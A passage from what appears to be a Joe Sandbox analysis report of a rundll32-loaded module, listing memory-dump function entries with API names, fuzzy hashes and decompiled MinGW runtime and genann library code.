                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: DestroyHeap
                                      • String ID:
                                      • API String ID: 2435110975-0
                                      • Opcode ID: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                      • Instruction ID: a3032cae2ea9e4c98ae8ed138309475dc8e7ccaa7c0b0ccec29b1aee5fc7f911
                                      • Opcode Fuzzy Hash: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                      • Instruction Fuzzy Hash: 57016D75B0C5C48FF754EFFAACE952576B1FB89B14744003BD04AD6165CA3C68808752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                      • Instruction ID: 11b03ff7a2c96b8ad5f191002f8bf852cf9cda418336143b872da458ac8bdf4b
                                      • Opcode Fuzzy Hash: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                      • Instruction Fuzzy Hash: 3EF0A026B0C1C94AF710AFFA5C9C137A672EB89321F255A3BE14BD6182D93D98C18241
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FunctionTable
                                      • String ID:
                                      • API String ID: 1252446317-0
                                      • Opcode ID: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                      • Instruction ID: 5d4da780d9484f1210faa8de8b0593b035d6e8f21040fd0dc0b72707f654fbdd
                                      • Opcode Fuzzy Hash: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                      • Instruction Fuzzy Hash: 5DE04F305109055BEB68EBADC84DBA03AE0EB5C319F50426DD409C5192CB3998DBCF82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                      • Instruction ID: b2e0facebb4b186569dfe3c4c799b8cdbc23df6ee7c3bf2a6a98227e0495799a
                                      • Opcode Fuzzy Hash: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                      • Instruction Fuzzy Hash: CED05E12B15E0D1BAB9CA6FF1C9D13626E5E7D81227440537AC09C2261EC68CC864250
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                      • Instruction ID: 01add39f6a1bfd900e3ecdd5735d2976e9ccf2b0c58e886e6be9ca1fdfcb1d94
                                      • Opcode Fuzzy Hash: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                      • Instruction Fuzzy Hash: D0E01235A1044856F749B771EC9E4E73771EB54300B804166D80B910B7ED2C52C68681
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: d6e092558d37e5058eb99c715a6fdd0ef8159752f8b1518dfc606e572a5f4849
                                      • Instruction ID: d7737b02c071574f8961fb16775e12c354350c9bf5aa78c23973d13d9f649f94
                                      • Opcode Fuzzy Hash: d6e092558d37e5058eb99c715a6fdd0ef8159752f8b1518dfc606e572a5f4849
                                      • Instruction Fuzzy Hash: 9FB0122CD27C4B03ED5C3BFB0EBD0693870AF18205FC40114D816C0059E50CC5E95342
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                      • Instruction ID: 01f8c864d187ec1d8ac46b5ba56906995442c0155a96ef831c188d40883f6af3
                                      • Opcode Fuzzy Hash: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                      • Instruction Fuzzy Hash: 27B0122482BDBB06ED9D3BF70C6E0253870AF08311FC40054D80BC0040EE0CC5D46382
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID:
                                      • API String ID: 1586166983-0
                                      • Opcode ID: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                      • Instruction ID: 57dae1e2cf1766621eb98e3268235dafe1379f1cb68ac433f2e42de13678d7aa
                                      • Opcode Fuzzy Hash: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                      • Instruction Fuzzy Hash: B2F027363049094BFB649FAAAC886FB37B9EB84341B048726D40BC52A0EF2CDD54A744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: -
                                      • API String ID: 2918714741-2547889144
                                      • Opcode ID: 68bb0a80ec49b0e7f88bd808b78395ea7d964b6984d12873a8541eda6f2b0fbb
                                      • Instruction ID: 2696a3ce3859f7ad0305adb1272e85ac0e810f0822ebfcb8963aed6b2ff07916
                                      • Opcode Fuzzy Hash: 68bb0a80ec49b0e7f88bd808b78395ea7d964b6984d12873a8541eda6f2b0fbb
                                      • Instruction Fuzzy Hash: B551D062E0D27E06FB615A219C4437E16C1EF11BA8F550932ED2A0E2D1DE3DF849C779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno$freemallocperrorrand
                                      • String ID: %le$%d %d %d %d$fscanf
                                      • API String ID: 1124544454-3358677296
                                      • Opcode ID: 735b5874b61b143b278a93e138aa00dc076640b1d8bc7826092de63a36425ffd
                                      • Instruction ID: f0ac8e76d0cca94576e0a2e579a95c35ab953a7b7043933287f44c76c9461b2c
                                      • Opcode Fuzzy Hash: 735b5874b61b143b278a93e138aa00dc076640b1d8bc7826092de63a36425ffd
                                      • Instruction Fuzzy Hash: 3B218E73A1962A85E6619B15AD005AA6364EF94790F840037FE4E073D8EF7CE848CB39
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: -
                                      • API String ID: 2918714741-2547889144
                                      • Opcode ID: d85ffac46bb8c9478375b9dca42e0fe49a7e84fed0f35d7d7f0dcfffd4929f75
                                      • Instruction ID: d7b8f3efc13bfad5a19295d894ab0e34f706685f21caca0128e726a174d79d9a
                                      • Opcode Fuzzy Hash: d85ffac46bb8c9478375b9dca42e0fe49a7e84fed0f35d7d7f0dcfffd4929f75
                                      • Instruction Fuzzy Hash: 0951F122E0D57E06FB615A219C4033D1A81EF117A8F554933ED6E2E2C1DE3CE849C239
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Local$Free$Alloc$memcpy
                                      • String ID:
                                      • API String ID: 1922247932-0
                                      • Opcode ID: d6784d07d633169ee089b7567f5e597946a0749f05af4994d6e4f760a0c8c563
                                      • Instruction ID: a4d1b127b171e87feb2142dd02de427cd85691712f817ab12e5cdd0a204098ca
                                      • Opcode Fuzzy Hash: d6784d07d633169ee089b7567f5e597946a0749f05af4994d6e4f760a0c8c563
                                      • Instruction Fuzzy Hash: 8DD19E32A0966A86FB288F25DC9073933A1FF44B49F544136EA0D4A2C4DF3DE849C779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E00007FFC7FFC288E3A10(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
                                      				void* _v32;
                                      				intOrPtr _v108;
                                      				void* _v144;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t22;
                                      				void* _t26;
                                      				intOrPtr _t42;
                                      				long long _t44;
                                      				intOrPtr* _t46;
                                      				long long _t47;
                                      				intOrPtr* _t49;
                                      				intOrPtr _t50;
                                      				void* _t51;
                                      				void* _t52;
                                      				signed long long _t55;
                                      				long long _t59;
                                      				intOrPtr _t64;
                                      				struct _MEMORY_BASIC_INFORMATION* _t67;
                                      				intOrPtr _t76;
                                      				long long _t80;
                                      
                                      				_t26 = __ebx;
                                      				_t44 =  &_a16;
                                      				_a16 = __rdx;
                                      				_a24 = __r8;
                                      				_a32 = __r9;
                                      				_v32 = _t44;
                                      				_t20 = E00007FFC7FFC288F12C0(_t19, 2, _t44, __rcx);
                                      				r8d = 0x1b;
                                      				0x288f0ba8(_t51);
                                      				_t52 = _v32;
                                      				E00007FFC7FFC288F12C0(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
                                      				_t59 = _t44;
                                      				0x288f0b08();
                                      				0x288f0bc8();
                                      				asm("o16 nop [eax+eax]");
                                      				_t80 = _t59;
                                      				if (_t26 <= 0) goto 0x288e3bb0;
                                      				_t46 =  *0x288ff0c8 + 0x18;
                                      				asm("o16 nop [eax+eax]");
                                      				_t64 =  *_t46;
                                      				if (_t64 - _t80 > 0) goto 0x288e3acc;
                                      				_t76 =  *((intOrPtr*)(_t46 + 8));
                                      				r8d =  *((intOrPtr*)(_t76 + 8));
                                      				if (_t80 - _t64 + _t76 < 0) goto 0x288e3b53;
                                      				_t47 = _t46 + 0x28;
                                      				if (1 != _t26) goto 0x288e3ab0;
                                      				_t22 = E00007FFC7FFC288E4200();
                                      				if (_t47 == 0) goto 0x288e3bd2;
                                      				_t55 =  *0x288ff0c4 +  *0x288ff0c4 * 4 << 3;
                                      				_t49 =  *0x288ff0c8 + _t55;
                                      				 *((long long*)(_t49 + 0x20)) = _t47;
                                      				 *_t49 = 0;
                                      				E00007FFC7FFC288E4330(_t22, _t76);
                                      				r8d = 0x30;
                                      				_t50 =  *0x288ff0c8;
                                      				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
                                      				VirtualQuery(_t52, _t67, __rcx);
                                      				_t42 = _t50;
                                      				if (_t42 == 0) goto 0x288e3bb7;
                                      				if (_t42 == 0) goto 0x288e3b4c;
                                      				if (_t42 != 0) goto 0x288e3b60;
                                      				 *0x288ff0c4 =  *0x288ff0c4 + 1;
                                      				return _v108;
                                      			}


                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryVirtual
                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                      • API String ID: 1804819252-1534286854
                                      • Opcode ID: 02008b3e5bb103b3afd73c81780cf105471e2ef8eecae5ab65a97716877332af
                                      • Instruction ID: c5e322d7ad8e4639e30b96b2ffedf3812293cf44db5bc32554d3b997ad9bf01e
                                      • Opcode Fuzzy Hash: 02008b3e5bb103b3afd73c81780cf105471e2ef8eecae5ab65a97716877332af
                                      • Instruction Fuzzy Hash: 7C41C471B08B5A81EB109B11EC4027973A0FF95B84F884136EA4D4B7D4EF3CE448C728
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _assert$memcpy
                                      • String ID: genann\genann.c$o - ann->output == ann->total_neurons$w - ann->weight == ann->total_weights
                                      • API String ID: 3718630003-1318605265
                                      • Opcode ID: e190a37e812a3474c16ec5c6e7c50aab393a5329ba5c128ff7ae18e22b284ef4
                                      • Instruction ID: 90cac3234885d278a967771c551080853e9c27d233eb048253d5aa12967216c9
                                      • Opcode Fuzzy Hash: e190a37e812a3474c16ec5c6e7c50aab393a5329ba5c128ff7ae18e22b284ef4
                                      • Instruction Fuzzy Hash: DE71F232E14A5D86DB25CF29CD4013A7361FF15786F89C236DA1D5B280EF38E86AC324
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 40%
                                      			E00007FFC7FFC288E8180(signed int __ecx, signed int __edx, void* __eflags, void* __rdx) {
                                      				signed int _t3;
                                      				signed int _t6;
                                      				void* _t9;
                                      
                                      				asm("movaps [esp+0x40], xmm6");
                                      				asm("dec ax");
                                      				asm("dec ax");
                                      				asm("movapd xmm2, xmm0");
                                      				_t3 = __edx & 0x000fffff | __ecx;
                                      				_t6 = __edx & 0x7ff00000;
                                      				r8d = _t3;
                                      				r8d = r8d | _t6;
                                      				if (__eflags == 0) goto 0x288e81f0;
                                      				_t9 = _t6 - 0x7ff00000;
                                      				if (_t9 == 0) goto 0x288e8208;
                                      				asm("comisd xmm0, [0xb5bc]");
                                      				if (_t9 > 0) goto 0x288e8270;
                                      				asm("movsd xmm1, [0xb5a6]");
                                      				asm("pxor xmm0, xmm0");
                                      				asm("comisd xmm1, xmm2");
                                      				if (_t9 <= 0) goto 0x288e8310;
                                      				asm("movaps xmm6, [esp+0x40]");
                                      				return _t3;
                                      			}


                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: exp
                                      • API String ID: 2918714741-113136155
                                      • Opcode ID: d1d1dcc1b485baa2fffa771909adaccb74c373e4d3286d3a411ca18d67bb767f
                                      • Instruction ID: e3abe022e303307bc22ce1561861b23a273ffe292060a30271dc2719eb8d7aa3
                                      • Opcode Fuzzy Hash: d1d1dcc1b485baa2fffa771909adaccb74c373e4d3286d3a411ca18d67bb767f
                                      • Instruction Fuzzy Hash: A0512622D0CE5D82E303AF34EC1116E6361FFA7745F809332E689255A8EF2ED455CA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 805e3f78ab6754860f43c6c92a3b6ca52ef1522a5984a8971599d109d4b6c01c
                                      • Instruction ID: f430a03b1fe3fa3c4ac9f8ee10a8108a0dc5a90d9dc596889f152c0b8bcc76b5
                                      • Opcode Fuzzy Hash: 805e3f78ab6754860f43c6c92a3b6ca52ef1522a5984a8971599d109d4b6c01c
                                      • Instruction Fuzzy Hash: 40C11762E1826A86EB604A24CC0437E26A1FF10769F154236EE1D4F7C5CABDEC49C778
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2a52c11119825b675356fc753dfd308eadb1c865dec9a01802f63490371f166
                                      • Instruction ID: 233040beabea506d91f931639d43f7f6aee0579a65c19cb58b366bdcdc8dc552
                                      • Opcode Fuzzy Hash: d2a52c11119825b675356fc753dfd308eadb1c865dec9a01802f63490371f166
                                      • Instruction Fuzzy Hash: AF91C8B2E0926E86E7658F298D003796791FB05B99F548132EE0D1B7C4DBBCE809C774
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Sleep_amsg_exit
                                      • String ID:
                                      • API String ID: 1015461914-0
                                      • Opcode ID: da23177db8870cd305cfdc912a2b4f64142ffc19fd8b7c68ca74381044dd9292
                                      • Instruction ID: 4d7ddfd47ac0edee89ff6ba75b0d573b944427f3290916c0ad9dc36e9ea1b6df
                                      • Opcode Fuzzy Hash: da23177db8870cd305cfdc912a2b4f64142ffc19fd8b7c68ca74381044dd9292
                                      • Instruction Fuzzy Hash: D8417E36A0956A86F6569B16EC503792291FF94795F884037DD0C8B3D5DE3CE889C338
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Byte$CharLeadMultiWide
                                      • String ID:
                                      • API String ID: 2561704868-0
                                      • Opcode ID: 7c9ce33a7e5a0fb0f6908d8783dccc228db8783c15d05485717ff8ae8e8f10b9
                                      • Instruction ID: e80eb62b776c49c995f87c6ad719e5db84001aba7ac457696dffec3961fbdc56
                                      • Opcode Fuzzy Hash: 7c9ce33a7e5a0fb0f6908d8783dccc228db8783c15d05485717ff8ae8e8f10b9
                                      • Instruction Fuzzy Hash: FA31E672A0C2958BE3A08B28FC0036D7690FBB5794F948236DA98877D5DF3DD489CB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: genann\genann.c$w - ann->weight == ann->total_weights
                                      • API String ID: 3510742995-1732016904
                                      • Opcode ID: 5a7260e50099df0275c28712a2baaf7ca60d64651466be3262114e1141f13a5f
                                      • Instruction ID: 12773453919cc770f542f0efc633b16ce3af45b9460e205bda51a9ab836deee9
                                      • Opcode Fuzzy Hash: 5a7260e50099df0275c28712a2baaf7ca60d64651466be3262114e1141f13a5f
                                      • Instruction Fuzzy Hash: 64D11872A18E5986CB21CF24EC5062DB764FF957C8F059323EA4E27BA4DB38E945C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: !isnan(a)$genann\genann.c
                                      • API String ID: 1222420520-4084395310
                                      • Opcode ID: c64f3bb4aa90e2a2e17399b77a9a3f6e58ef0b4053caa16cef96f264f7440d6f
                                      • Instruction ID: 22a24c13c9cd37657a2c15c6374b3041cd877044d6c1f894524896f91ec68324
                                      • Opcode Fuzzy Hash: c64f3bb4aa90e2a2e17399b77a9a3f6e58ef0b4053caa16cef96f264f7440d6f
                                      • Instruction Fuzzy Hash: DB119351E08EAEC5EA239B349C112355315FFA23C5F84C333F40D6A1E1EF2DA05AC628
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00007FFC7FFC288ECFC0(signed int __edx, void* __eflags, void* __rax, void* __rcx) {
                                      				void* _t6;
                                      				void* _t12;
                                      				void* _t13;
                                      				intOrPtr* _t15;
                                      				void* _t20;
                                      				void* _t21;
                                      				intOrPtr* _t27;
                                      				void* _t32;
                                      
                                      				_t21 = __rax;
                                      				if (__eflags != 0) goto 0x288ed118;
                                      				if (__eflags == 0) goto 0x288ed05b;
                                      				_t27 =  *0x288ff180;
                                      				_t15 = _t27;
                                      				if (_t15 == 0) goto 0x288ed148;
                                      				goto 0x288ed01f;
                                      				if (_t15 == 0) goto 0x288ed05b;
                                      				if ( *_t27 == 0) goto 0x288ed070;
                                      				if ((__edx >> 0x00000002 >> 0x00000001 & 0x00000001) == 0) goto 0x288ed010;
                                      				_t6 = E00007FFC7FFC288ECE60(_t12, _t13, __rax, __rcx,  *_t27, _t32);
                                      				if (_t21 == 0) goto 0x288ed140;
                                      				if (__rcx == 0) goto 0x288ed0e0;
                                      				_t20 =  *((intOrPtr*)(__rcx + 8)) - 9;
                                      				if (_t20 <= 0) goto 0x288ed0a0;
                                      				free(??);
                                      				if (_t20 != 0) goto 0x288ed014;
                                      				return _t6;
                                      			}

                                      0x7ffc288ecfc0
                                      0x7ffc288ecfd8
                                      0x7ffc288ecfe4
                                      0x7ffc288ecfe6
                                      0x7ffc288ecfed
                                      0x7ffc288ecff0
                                      0x7ffc288ed00a
                                      0x7ffc288ed012
                                      0x7ffc288ed01a
                                      0x7ffc288ed022
                                      0x7ffc288ed02a
                                      0x7ffc288ed035
                                      0x7ffc288ed03e
                                      0x7ffc288ed044
                                      0x7ffc288ed04a
                                      0x7ffc288ed052
                                      0x7ffc288ed059
                                      0x7ffc288ed06c

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSectionfree
                                      • String ID:
                                      • API String ID: 1679108487-0
                                      • Opcode ID: efd6d315a87f7d84d699918e636374ed1ab0ac31f2860f3c33c85e5f51e01751
                                      • Instruction ID: 0905b9178f4cddc5cfee4c1372c560c0765f941f2625c4a56dca914bbd9ee9eb
                                      • Opcode Fuzzy Hash: efd6d315a87f7d84d699918e636374ed1ab0ac31f2860f3c33c85e5f51e01751
                                      • Instruction Fuzzy Hash: DE416D21E09A3A81FA219B09DE1033A6291EF14B84F584037ED1D4F7C1EE2DB45EC278
                                      Uniqueness

                                      Uniqueness Score: -1.00%